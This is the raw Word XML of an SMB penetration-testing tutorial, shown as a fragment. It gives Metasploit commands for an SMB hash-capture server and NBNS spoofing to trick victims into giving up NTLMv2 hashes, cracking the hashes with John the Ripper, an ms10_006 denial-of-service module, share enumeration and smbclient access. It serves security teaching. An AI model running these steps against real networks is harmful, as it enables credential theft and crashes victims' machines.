    <w:p w14:paraId="410982FA"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provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain &amp; Abel, L0phtcrack or John the Ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F28F62" w14:textId="13E54571"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FE90EE2">
          <v:shape id="_x0000_i1246" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId25" w:name="DefaultOcxName7" w:shapeid="_x0000_i12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22FAB326" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08735EEC"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4D0D3FA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1050B5A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035681EC"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6645" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C2E69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auxiliary/server/capture/smb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58142C7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auxiliary(smb) &gt; set srvhost 192.168.1.109</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18FB426D"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auxiliary(smb) &gt; set johnpwfile /root/Desktop/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A301DF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auxiliary(smb) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06B77C9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Simultaneously run NBNS_response module under capture smb module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48347BA3"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forges the NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2077E592" w14:textId="0F1E3F2A"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4AECA87A">
          <v:shape id="_x0000_i1245" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId26" w:name="DefaultOcxName8" w:shapeid="_x0000_i12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335"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="2D0010EC" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32AEE536"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7A9C13E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50B50D44"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lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCABCF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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18BF888D"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lastRenderedPageBreak/>
              <w:t>auxiliary/spoof/nbns/nbns_response</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E64DA3"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auxiliary(nbns_response) &gt; set spoofip 192.168.1.109</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C3D1379"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lastRenderedPageBreak/>
              <w:t>msf auxiliary(nbns_response) &gt; set interface eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E20D7B5"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auxiliary(nbns_response) &gt;exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7696033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As result, this module will generate a fake window security prompt on the victim’s system to establish a connection with another system in order to access shared folders of that system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7406AB92" w14:textId="5AD1B8DA"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740828E2" wp14:editId="577912C3">
            <wp:extent cx="5731510" cy="28384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3EF108A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We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from the given image you can observe that port </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>137 </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> open</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>NetBIOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>network service in our local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE50DC9" w14:textId="51DEB986"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78155AC3" wp14:editId="4DA87008">
            <wp:extent cx="5731510" cy="16262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p>
    <w:p w14:paraId="514EB72D"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when the victim will try to access our share folder, therefore, he will try of connecting with us through his network IP, given below image is a proof to demonstrate that victim is connecting malicious IP: 192.168.1.109. When the victim will try to access the shared folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing shared folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D62D69" w14:textId="33ED31CA"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6647E3FF" wp14:editId="37CC4E86">
            <wp:extent cx="4133850" cy="278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2781300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A98FCD8"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Awesome!! </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Once again the attacker had captured NTMLv2 hash, from the given image you can see that here also the attacker has captured:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A28D34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Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> raj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3EC281" w14:textId="78702744"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6F02A2E6" wp14:editId="3132799C">
            <wp:extent cx="5731510" cy="62503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250305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8BC0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use john the ripper to crack the ntlmv2 hash by executing given below command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671271B2" w14:textId="79A42991"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533035A8">
          <v:shape id="_x0000_i1244" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId31" w:name="DefaultOcxName9" w:shapeid="_x0000_i12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128F82DB" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49A09DF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31D9FB6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john john_smb_netntlmv2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="269BC18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From given below image you can confirm we had successfully retrieved the </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>password: 123</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> for user: pentest by cracking ntlmv2 hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B69AD"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To know more about it read the complete article from here “</w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>4 Ways to Capture NTLM Hashes in Network</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1D656" w14:textId="08B3D112"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7B8761A4" wp14:editId="18657E87">
            <wp:extent cx="5238750" cy="291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2914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B85578"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SMB DOS-Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B3A738"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 Dos attack is another most excellent method we have in our Metasploit framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72230C3F"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exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer or a Word document otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599C539" w14:textId="78DC5EAA"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3B9DB33">
          <v:shape id="_x0000_i1243" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId34" w:name="DefaultOcxName10" w:shapeid="_x0000_i12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FD1F03" w:rsidRPr="00873D4D" w14:paraId="6D168C8B" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="372FEAC2"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444DE027"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7A9D2389"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9690" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79694A2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auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="574DF4DC"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auxiliary(ms10_006_negotiate_response_loop) &gt; set srvhost 192.168.1.106</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B77529"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auxiliary(ms10_006_negotiate_response_loop) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="151AAAD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when the victim will try to access the shared folder through our malicious IP, the target machine will get crushed and this attack is very effective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B195EDD" w14:textId="6BAFB345"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5C1AE880" wp14:editId="2ECF8F0D">
            <wp:extent cx="5731510" cy="11855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p>
    <w:p w14:paraId="57590CD1"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Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4D812D"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will enumerate configured and recently used file shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E614741" w14:textId="5E026E5B"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="2730" w:dyaOrig="1395" w14:anchorId="0F566074">
          <v:shape id="_x0000_i1242" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId36" w:name="DefaultOcxName11" w:shapeid="_x0000_i12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431C5C6A" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04F77364"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24127096"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7275F93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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6645" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E795B1"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post/windows/gather/enum_shares</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79667CF1"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post(enum_shares) &gt; set session 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD41AFD"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post(enum_shares) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="321215C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you can observe that, here it has shown three UNC paths that have been entered in the run dialogue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9D013" w14:textId="5527DD4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7FBEEF78" wp14:editId="08238166">
            <wp:extent cx="5705475" cy="2762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1105ADF"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File Sharing  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7ADB21"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000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Smbexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73354AB7"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we will use a python script that activates SMB service in our Linux machine. This is useful in the situation where the target machine does NOT have a writeable share available. You can visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> for this python script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80447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 copied the python code from GitHub and past it into a text file as </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>smbserver.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> in the desktop folder. Now execute give below command for a shared folder “raj”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D072E8" w14:textId="653F8A2D"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5AF5CAAC" wp14:editId="616B1CDF">
            <wp:extent cx="5731510" cy="19742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74215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD5260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Since we are aware of smb service which is running in host machine 192.168.1.108 and being using window platform we can access it share folder through Run command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28204B7C" w14:textId="5542B865"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226D20E5" wp14:editId="1C070B21">
            <wp:extent cx="3800475" cy="1952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0475" cy="1952625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC9A5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Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it. In this way, we can use smb python script for sharing file between Windows and Linux machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB970E3" w14:textId="037FF9E2"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4F93C70F" wp14:editId="502A5808">
            <wp:extent cx="5731510" cy="35159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15995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="672CB5B7"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000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394413FC"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smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the FTP program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF709C" w14:textId="2DA5B9F1"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="2730" w:dyaOrig="1395" w14:anchorId="73486A6E">
          <v:shape id="_x0000_i1241" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId42" w:name="DefaultOcxName12" w:shapeid="_x0000_i12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633E7400" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="624FBDC7"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28306279"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smbclient –L 192.168.1.108</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DF51F1B" w14:textId="4810CFBA"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3C27F1F3" wp14:editId="4A7365AF">
            <wp:extent cx="5731510" cy="1530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530985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB7395B" w14:textId="1223454E"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379D802">
          <v:shape id="_x0000_i1240" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId44" w:name="DefaultOcxName13" w:shapeid="_x0000_i12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215E47B7" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63203D49"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66DC02A4"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smbclient //192.168.1.108/raj</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38F1EDC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you can observe with the help of smbclient we are able to view the shared folder of victim’s machine. Moreover, we can use smbclient for sharing a file in the network. Here you can observe we had login successfully using raj: 123 logins and transfer the user.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CC5C3" w14:textId="0FD74F85"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5460B1AC" wp14:editId="0E814240">
            <wp:extent cx="5731510" cy="19589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58975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F709B01" w14:textId="4F4DD59E" w:rsidR="006730DC" w:rsidRPr="00873D4D" w:rsidRDefault="006730DC" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7808FEF1" w14:textId="0C294DA7" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2794BAF0" w14:textId="0FD456AB" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698DBDEC" w14:textId="7DBC02BD" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A82524C"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lastRenderedPageBreak/>
        <w:t>Table of Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BD685" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Nmblookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29818CE7" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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nbtscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A073290" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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SMBMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312BA471" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72504CA1" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Rpcclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D98A491" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Nmap</w:t>
      </w:r>
    </w:p>
